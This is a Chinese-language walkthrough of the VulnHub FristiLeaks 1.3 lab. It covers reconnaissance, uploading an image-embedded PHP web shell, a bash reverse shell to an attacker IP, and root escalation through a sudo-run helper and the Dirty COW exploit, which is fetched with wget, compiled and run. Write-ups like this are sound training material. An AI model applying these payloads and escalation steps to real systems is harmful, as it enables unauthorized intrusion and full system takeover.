*VulnHub-FristiLeaks:1.3暴力解法、细节解法，主打软硬都吃，隧道搭建、寻找exp、提权、只要你想没有做不到的姿势

一、信息收集

1、扫靶机ip

经典第一步，扫一下靶机ip

arp-scan -l
扫描同网段
nmap -sP 192.168.122.0/24

2、指纹扫描、端口

nmap -sV -O -p 1-65535 192.168.122.128
nmap -sS -sV 192.168.122.128
nmap -p- -sV -A 192.168.122.128
whatweb -v 192.168.122.128

只扫出了一个端口，估计要跟网页打交道了，这里有个php5.3.3留意一下，可能有说法

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

3、访问80端口

一个登录页面,尝试尝试sql和弱口令，因该是登录不了

这个页面的源代码有这样看着像加密的数据，我们去尝试尝试解码一下

base64解密一下看着像一张图片，解码是乱码，我们用kali去转化一下

base64 -d base64.txt > base64.png

这里原来是密码，账户名是作者名字

因该是文件上传了，可以做一个后门文件丢进去然后拿蚁剑、冰蝎连一下。

❝

这里介绍一下如何制作图片木马

1、cmd命令将php的内容添加到png中生成新的png

copy /b 1.jpg + 1.php muma.png
这里1.jpg是源图片，1.php是木马文件，最后muma.png就是我们生成的图片马

然后这里蚁剑也是能连上的，可以在蚁剑上弹shell

这里蚁剑开终端还是挺舒服的

这里貌似是一个漏洞，先查看一下内核版本吧

这里是找到了一些提示，说实话这个因该是翻译问题，看的我很眩晕，大概意思说把runthis文件丢进tmp里，然后runthis里的命令每一分钟都会以他的账户运行

我们输入echo “/home/admin/chmod 777 /home/admin” > /tmp/runthis就能访问admin了

4、建立隧道，蚁剑、冰蝎、nc（瑞士军刀）

首先我们在kali终端建立一个nc监听

这里丢了一个phpinfo.php.gif是可以访问的,想说一点就是有时候连接可能会失败，总有一些莫名原因，这时候我们能做的就是不断尝试，不断试错。还有耐心，patience is the key in life。

我们也拿到了一个apache的权限

<?php system("bash -c 'sh -i &>/dev/tcp/192.168.66.129/6666 0>&1'");?>
这段代码就是我们放入a.php.png里面的语句，是一个反连语句，就是让靶机的bash创建一个shell给我们，给到我们的攻击机

5、提权

2025.3.6 AM: 10:49

方法一：python脚本

这里总结一下第二个方法，个人觉得这个方法应该是顺着作者方法进行的，因为靶机会提示你并给你引导至python脚本那一块，但是两种方式都可以，毕竟内核版本太老了 这里我们还是用kali来提权，蚁剑还是不太方便，用蚁剑vim时候不回显，不知道是不是shell不完整的问题。

两个解码出来LetThereBeFristi!和thisisalsopw123，根据之前看到的脚本whoisyourgodnow，大概能确定sudo账户是fristigod尝试登录 这里提到的权限是fristigod

这张图片在别的师傅哪儿是提示出来的，但是我这儿没有，可能是我已经提权到了还是怎么着，他告诉我们有一个root权限的文件夹，路径也给我们了，直接塞一个提权命令就可以了。这个root是任何命令都以root权限执行 旁边有个日志文件，但是可能是我这个靶机不完整，应该是有一个flag的，但是我只需要提权就完成了

sudo -u fristi ./doCom /bin/bash -p
用fristi用户执行doCom文件，然后让bash开一个新的shell，这样我们就能完成提权了，不过为什么不是root用户，是因为我使用过脏牛提权了，留下了一个管理员账户，但是id=0就已经是管理员组了

这里就是系统管理员了，就是利用这个root用户运行的doCom就能提权了

这里也是给大家找了个小彩蛋，虽然我是打靶机的，但是这道题原本应该是ctf题，挺变态的，出这种难度，说实话，这作者还挺自恋的哈。

这个作者让我花了一天时间，我觉得把flag改成下面的会更好

2025.3.6 AM: 11:28

方法二：脏牛提权，寻找exp.

uname -a
我们查看一下内核信息

靶机版本信息:Linux 2.6.32-573.8.1.el6.x86_64 这里看版本信息因该是可以使用

影响范围：Linux内核版本2.6.22（2007年发布）至修复前版本（2016年10月修复），包括CentOS、Ubuntu、Android等系统searchsploit linux 2.6.32 Privilege
寻找linux的exp或者去github下一个脏牛exp

这个还有教程，尝试一下这个exp。

1、首先开python或者apache2
python -m http.server 80
service apache2 start2、靶机下载脏牛的c语言脚本
wget http://192.168.66.129/dirty.c3、用gcc编译脏牛（dirty.c）名为exp
gcc -pthread dirty.c -o exp -lcrypt4、修复shell，因为这里shell是不完整的，大概运行到第5步会提示你
python -c 'import pty;pty.spawn("/bin/bash")'5、运行，这里是自己设置密码，账户就是exp作者给你的
./exp 1234566、提权
su firefart
123456
然后敲回车

最后用这个账户就能登陆了，密码就是你自己设置的

这里kali出毛病了疯狂报错，整个上午全在调试最后也是尝试出来了，很多雷区，师傅们打这个靶机时候小心一点。

到这里人已经眩晕了，我本想着今天打两台靶机的，但是先在是18：30了，吃饭去了。肝不动了。如果有师傅遇到问题问就可以了，虽然我这瓜不保甜，但我尽力